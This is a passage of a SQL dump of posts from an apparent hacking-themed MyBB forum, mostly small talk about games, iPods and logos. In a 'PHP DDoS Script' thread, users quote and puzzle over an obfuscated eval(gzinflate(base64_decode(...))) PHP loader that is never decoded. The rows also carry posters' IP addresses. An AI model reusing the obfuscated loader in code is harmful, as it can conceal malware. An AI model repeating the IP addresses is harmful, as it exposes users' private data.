`ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4630', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '62', 'R?????zo?', '1350228970', 'Looks like I won again! :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '4a2512cc295a47762e5e3771c40eb058', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4631', '515', '2552', '3', 'RE: [Announcement] MyBBTopSites/ForumTopSites Vote For L33tHacking', '0', '62', 'R?????zo?', '1350229004', 'Voted, looks like we are doing it well :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'e45f55d19858544634381da05abe38a9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4632', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '62', 'R?????zo?', '1350229076', 'I\'m not on that list :( I guess you forgot me :(', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '730aa7b720863deb88742f9bce5dadb3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4633', '849', '4616', '73', 'RE: when did you buy your ipod', '0', '62', 'R?????zo?', '1350229320', '[quote=\'iTzIpod\' pid=\'4616\' dateline=\'1350224909\'] Yeah. But it got cheaper after a while. Which I don\'t like :p [/quote] that\'s the thing about technology :P gets cheaper when a new feature is discovered or implemented.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '0ac383f4727fe4f4885e1a15f2a0ae10', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4634', '619', '3008', '34', 'RE: [Photoshop CS5] How to make a logo', '0', '62', 'R?????zo?', '1350229384', 'I will rep you too even though I already knew most things about this tutorial :P Thanks anyways.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '6c1c413cee8a61df3171d735101ad9d5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4635', '856', '4566', '42', 'RE: Anonymous Project Mayhem 2012 | Dangerous Idea #1 / Leak it ALL!', '0', '62', 'R?????zo?', '1350229509', 'That\'s actually a good idea if you ask me, abit crazy but yeah :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '81baece213c6bda9b5ba9d5315f802bc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4636', '822', '4302', '47', 'RE: Huge Ultimate Graphics Pack Worth $2.400 | GIVEAWAY | Become A Pro GFX Designer |', '0', '62', 'R?????zo?', '1350229900', 'I will join this, seems like nobody else is participating anyways :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '77554cb5b691ccd3cb13f657f53f8b3b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4637', '819', '4292', '68', 'RE: PHP DDoS Script', '0', '67', 'HoverCatz', '1350230710', 'This looks dangerous: eval(gzinflate(base64_decode(\'jVPva5xAEP1+cP/DsAh3QlNb6IfQqF8S0xaSXrjzAsUc4rl7vQV1l3UsTUL+9+4vg/RSqMi6uu/Nm5k3MqWEKhWTQiHvfi4/hBfzWUBFrSCBoNxk6/tsXZCr1eX2Nvuel+vVKic7jeEHWAbllywvFoNsFjtIEliIii5CeJ7PWH0UEMfx1/z2Zj6LZWqXa94w2MpGw+Jon8aR/e5WrPYNM5uDUC2wrsZHyRLSDg1yWSmMzPczWmFFAFqGR0ETcrfa5MSQeCcHBEc5ckpZR6CrWv1W1QR+V??c2gt4NVtnhUdqWplusQev6kzz+S9IcYFNg0P0McmbNUPzXOoV+VHOHT+ahy0BTi9e0+HVmRl/qHoOsGXHH134q+GmtSNCYgKzyOCSD7jSdd6Yd9y/GVvfW98FIBso7OZ8Yu7y3ve4baYdPiwoXfhaG2NnBtNFXaEZkC3gfl9bebbFO4JuwKYrKbzMsUnCSEhM??9/h3ub/+IC1EI+Lk8w2MrS4d7BJFxoJxH0ZaeRWFvdMaOAQjd8gn7oyMUUfQYb3XGNIXBalTFDVwvEsV6ANT0b1??aTi2mGSmT8L/Lj7mfJwd/8B\')));', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', '6fa648576074f233614d6472352c648f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4638', '859', '4592', '7', 'RE: Absence for 4 days', '0', '61', 'NXK', '1350232579', 'Thread has been moved, And goodluck on your trip!', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '15418cf7f6aa07825215de4d396f6cd2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4639', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '254', 'Greed', '1350232862', 'yeah, i just started it like a week ago', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '5e5c320a879cfff6ab0d58a74c97d4c1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4640', '864', '0', '79', 'Need some coder to check this code', '0', '1', 't3h jok3r', '1350233613', 'http://l33thacking.net/thread-819.html', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b5e65d3cab4d1803678c1297077de227', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4641', '792', '4137', '61', 'RE: Unique - Rules [PLEASE READ]', '0', '62', 'R?????zo?', '1350234044', 'You should be a mod now :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'cac27630689d918d3e234ddf40d53a5d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4642', '792', '4137', '61', 'RE: Unique - Rules [PLEASE READ]', '0', '82', 'iTzIpod', '1350235392', 'I am. Thanks @Reloadzor. :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c70962d0ad17afe12f1f480db18b9f25', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4643', '171', '528', '8', 'RE: What Genre do you listen to?', '0', '82', 'iTzIpod', '1350235444', 'Yeah. Sometimes, I get annoyed of Rap.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1a05e66b4593dadfe1c7a8abab28e95d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4644', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '82', 'iTzIpod', '1350235465', 'Replying to win :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4761319c0e7a20fc1d782b7786fba761', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4645', '515', '2552', '3', 'RE: [Announcement] MyBBTopSites/ForumTopSites Vote For L33tHacking', '0', '82', 'iTzIpod', '1350235512', 'Good job guys! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9904238ba54c0a07349b7ff8fa80d982', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4646', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '82', 'iTzIpod', '1350235540', 'Sorry :p Was busy when I made that post.. Too bad it isn\'t Summer anymore :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a30aa40873489939289207cdb71b4a36', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4647', '849', '4468', '73', 'RE: when did you buy your ipod', '0', '82', 'iTzIpod', '1350235566', 'Yeah. But it\'s business too. :/ Can\'t mess with it.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f38b061c598509bcb373ffbf1a8cc340', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4648', '619', '3008', '34', 'RE: [Photoshop CS5] How to make a logo', '0', '82', 'iTzIpod', '1350235592', 'Alright. Thanks :p Did you read my Rep Comment? :p The one that I gave you.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4913d9460a090286c1d783f1e7784fba', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4649', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '82', 'iTzIpod', '1350235692', 'Greed is a trusted user :D Thanks', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e51b08714675dc99c39cd80fe6603784', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4650', '792', '4137', '61', 'RE: Unique - Rules [PLEASE READ]', '0', '62', 'R?????zo?', '1350236214', 'Welcome back mate :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '6e756f32ec1f0915bd19a645b59417ba', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4651', '619', '3008', '34', 'RE: [Photoshop CS5] How to make a logo', '0', '62', 'R?????zo?', '1350236810', 'Of course I saw it :) thanks.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '785d98bc002f98c2682d4c4b73a3ea17', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4652', '619', '3008', '34', 'RE: [Photoshop CS5] How to make a logo', '0', '82', 'iTzIpod', '1350239678', 'No problem. It\'s true though :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e9b56d46965ac702d1a41a5ba77bccdb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4653', '792', '4137', '61', 'RE: Unique - Rules [PLEASE READ]', '0', '82', 'iTzIpod', '1350239703', 'Thank you.', '24.212.197.164', '416597412', '1', '0', '82', '1352550948', '1', '3002243aec9cbd18dbfe19f1cc7f83d7', '0', '1352550948'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7371', '792', '4137', '61', 'RE: Unique - Rules [PLEASE READ]', '0', '82', 'iTzIpod', '1352550976', 'Umm I can\'t access Unique\'s Member\'s list in the User CP thing. :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e3a39b35a4c140abadbbf3b3af3eb3c6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4654', '856', '4566', '42', 'RE: Anonymous Project Mayhem 2012 | Dangerous Idea #1 / Leak it ALL!', '0', '254', 'Greed', '1350245117', 'lol there stupid for even trying this, if every single information get leaked you know what would happen? Mass chaos', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '07586a7b4c2e442879f760ce2dddef4b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4655', '819', '4637', '68', 'RE: PHP DDoS Script', '0', '61', 'NXK', '1350249820', '[quote=\'HoverCatz\' pid=\'4637\' dateline=\'1350230710\'] This looks dangerous: eval(gzinflate(base64_decode(\'jVPva5xAEP1+cP/DsAh3QlNb6IfQqF8S0xaSXrjzAsUc4rl7vQV1l3UsTUL+9+4vg/RSqMi6uu/Nm5k3MqWEKhWTQiHvfi4/hBfzWUBFrSCBoNxk6/tsXZCr1eX2Nvuel+vVKic7jeEHWAbllywvFoNsFjtIEliIii5CeJ7PWH0UEMfx1/z2Zj6LZWqXa94w2MpGw+Jon8aR/e5WrPYNM5uDUC2wrsZHyRLSDg1yWSmMzPczWmFFAFqGR0ETcrfa5MSQeCcHBEc5ckpZR6CrWv1W1QR+V??c2gt4NVtnhUdqWplusQev6kzz+S9IcYFNg0P0McmbNUPzXOoV+VHOHT+ahy0BTi9e0+HVmRl/qHoOsGXHH134q+GmtSNCYgKzyOCSD7jSdd6Yd9y/GVvfW98FIBso7OZ8Yu7y3ve4baYdPiwoXfhaG2NnBtNFXaEZkC3gfl9bebbFO4JuwKYrKbzMsUnCSEhM??9/h3ub/+IC1EI+Lk8w2MrS4d7BJFxoJxH0ZaeRWFvdMaOAQjd8gn7oyMUUfQYb3XGNIXBalTFDVwvEsV6ANT0b1??aTi2mGSmT8L/Lj7mfJwd/8B\'))); [/quote] I try\'d to find out what that ran, Since it\'s decoding a string, so eval(gzinflate(base64_decode) Is decoding this encrypted string \"\'jVPva5xAEP1+cP/DsAh3QlNb6IfQqF8S0xaSXrjzAsUc4rl7vQV1l3UsTUL+9+4vg/RSqMi6uu/Nm5k3MqWEKhWTQiHvfi4/hBfzWUBFrSCBoNxk6/tsXZCr1eX2Nvuel+vVKic7jeEHWAbllywvFoNsFjtIEliIii5CeJ7PWH0UEMfx1/z2Zj6LZWqXa94w2MpGw+Jon8aR/e5WrPYNM5uDUC2wrsZHyRLSDg1yWSmMzPczWmFFAFqGR0ETcrfa5MSQeCcHBEc5ckpZR6CrWv1W1QR+V??c2gt4NVtnhUdqWplusQev6kzz+S9IcYFNg0P0McmbNUPzXOoV+VHOHT+ahy0BTi9e0+HVmRl/qHoOsGXHH134q+GmtSNCYgKzyOCSD7jSdd6Yd9y/GVvfW98FIBso7OZ8Yu7y3ve4baYdPiwoXfhaG2NnBtNFXaEZkC3gfl9bebbFO4JuwKYrKbzMsUnCSEhM??9/h3ub/+IC1EI+Lk8w2MrS4d7BJFxoJxH0ZaeRWFvdMaOAQjd8gn7oyMUUfQYb3XGNIXBalTFDVwvEsV6ANT0b1??aTi2mGSmT8L/Lj7mfJwd/8B\')));\" which comes out as [spoiler]J2pWUHZhNXhBRVAxK2NQL0RzQWgzUWxOYjZJZlFxRjhTMHhhU1hyanpBc1VjNHJsN3ZRVjFsM1VzVFVMKzkrNHZnL1JTcU1pNnV1L05tNWszTXFXRUtoV1RRaUh2Zmk0L2hCZnpXVUJGclNDQm9OeGs2L3RzWFpDcjFlWDJOdnVlbCt2VktpYzdqZUVIV0FibGx5d3ZGb05zRmp0SUVsaUlpaTVDZUo3UFdIMFVFTWZ4MS96MlpqNkxaV3FYYTk0dzJNcEd3K0pvbjhhUi9lNVdyUFlOTTV1RFVDMndyc1pIeVJMU0RnMXlXU21NelBjeldtRkZBRnFHUjBFVGNyZmE1TVNRZUNjSEJFYzVja3BaUjZDcld2MVcxUVIrVuKAi+KAi2MyZ3Q0TlZ0bmhVZHFXcGx1c1FldjZrenorUzlJY1lGTmcwUDBNY21iTlVQelhPb1YrVkhPSFQrYWh5MEJUaTllMCtIVm1SbC9xSG9Pc0dYSEgxMzRxK0dtdFNOQ1lnS3p5T0NTRDdqU2RkNllkOXkvR1Z2Zlc5OEZJQnNvN09aOFl1N3kzdmU0YmFZZFBpd29YZmhhRzJObkJ0TkZYYUVaa0MzZ2ZsOWJlYmJGTzRKdXdLWXJLYnpNc1VuQ1NFaE3igIvigIs5L2gzdWIvK0lDMUVJK0xrOHcyTXJTNGQ3QkpGeG9KeEgwWmFlUldGdmRNYU9BUWpkOGduN295TVVVZlFZYjNYR05JWEJhbFRGRFZ3dkVzVjZBTlQwYjHigIvigIthVGkybUdTbVQ4TC9MajdtZkp3ZC84QicpKSk7[/spoiler] So I think it\'s just some code to keep it fud from the host you have it on so they don\'t investigate the files but I don\'t know i\'m a noob with php n\' all that stuff.', '99.253.94.204', '1677549260', '1', '0', '61', '1350249886', '1', '4054ed382fd3fb7d55f635ee54d9efd1', '0', '1350249886'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4656', '864', '4640', '79', 'RE: Need some coder to check this code', '0', '61', 'NXK', '1350249939', 'http://l33thacking.net/thread-819-post-4655.html#pid4655 If I am right.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '80d07caf9c2a47fedce06abfb4a38db0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4657', '862', '4610', '71', 'RE: Mount and Blade 2 BannerLord', '0', '262', 'RAND0M1ZER', '1350250323', 'I got Mount and Blade warband during the Steam summer sale for a few bucks and I must say its quite a unique game. Up until then I had never played a game that featured musket warfare.', '108.162.138.186', '1822591674', '0', '0', '0', '0', '1', '2b8d88595ddefce6b32a4c3d43a24b63', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4658', '849', '4468', '73', 'RE: when did you buy your ipod', '0', '262', 'RAND0M1ZER', '1350250508', 'I bought an iPod video 5G in August of 2006, and I have been using it ever since. Unfortunately it got stolen from the gym locker about a year and half ago.', '108.162.138.186', '1822591674', '0', '0', '0', '0', '1', 'ecfac4f4cda78b5d2390d488f30e8c1f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4659', '850', '4478', '63', 'RE: anyone interested in making me a logo', '0', '262', 'RAND0M1ZER', '1350250589', 'The current one looks pretty good, or is this for another site?', '108.162.138.186', '1822591674', '0', '0', '0', '0', '1', 'f90c60769ed9e5d0aff18154bb92a7f0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4660', '849', '4468', '73', 'RE: when did you buy your ipod', '0', '82', 'iTzIpod', '1350252145', 'That sucks. And that\'s why I bring nothing to the gym. It can drop & break or get stolen/confiscated... Etc.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6c5a8f6971d5bea2081c593670f4be7a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4661', '850', '4478', '63', 'RE: anyone interested in making me a logo', '0', '82', 'iTzIpod', '1350252174', 'Can you give me some details on the logo? I can make it for you.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0d9c89f230f1b8f241db903ab52b837f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4662', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '2', 'Apathy', '1350252227', 'I am level 4. Some retard tried to troll me. He said want 200000 coins I am like lol sure he is like click crtl+w me not being a retard knew what it was and was like fack you. Lol.', '173.206.129.235', '-1378975253', '0', '0', '0', '0', '1', '9029c22f92010596ea4ca1d4476a6681', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4663', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '82', 'iTzIpod', '1350252533', 'Lol. I sometimes mean to press Shift (Left Shift) and press W... And I press Ctrl + W -.- Toki The ArchAngel.. I\'m botting it now.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0f2228e875bc04c7739f1f41d9e87afb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4664', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '254', 'Greed', '1350252905', 'Lol nice, I saw that on the page.', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '89d1125276927aa3866f6ae44a20cc2f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4665', '862', '4610', '71', 'RE: Mount and Blade 2 BannerLord', '0', '254', 'Greed', '1350252970', 'Yeah, it\'s pretty awesome game to me. It\'s on my greatest game list for me anyways can\'t wait for it to come out.', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '1f6096b2d17b593b51a3e36ebac4634d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4666', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '82', 'iTzIpod', '1350253143', 'What page? Did you see Toki\'s character page? Nothing new. Just some junk I got rid of... Kinda accidentally deleted some Member shit that was a collectible.. I didn\'t know -.- FML', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1dbfab0f9b879123056aa082c20b1215', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4667', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '254', 'Greed', '1350253497', 'not the char page,but go to the book of lore click badge and click on one of the badges then open the store.', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '9947c6ed9981211a7e7c4b31fd43f959', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4668', '829', '4667', '74', 'RE: Adventure Quest Worlds', '0', '82', 'iTzIpod', '1350253535', '[quote=\'Greed\' pid=\'4667\' dateline=\'1350253497\'] not the char page,but go to the book of lore click badge and click on one of the badges then open the store. [/quote] That\'s how I get the DF thing?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '649c778cfcee20ef5dc255bf5bc11244', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4669', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '254', 'Greed', '1350253695', 'no the collectable stuff you deleted', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', 'cfe9e461f68d0aad7a3ae6ea4ff73a9a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4670', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '82', 'iTzIpod', '1350253923', 'Oh. I thought you meant the DF items. So I was looking for it :p And the collectible items, yeah I just got them again. Thanks. Will they be there forever or something?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'edf79e095452b1a71b0a68fca09de364', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4671', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '254', 'Greed', '1350253979', 'yeah lol, their badges there not going away.', '63.153.255.202', '1067057098', '1', '0', 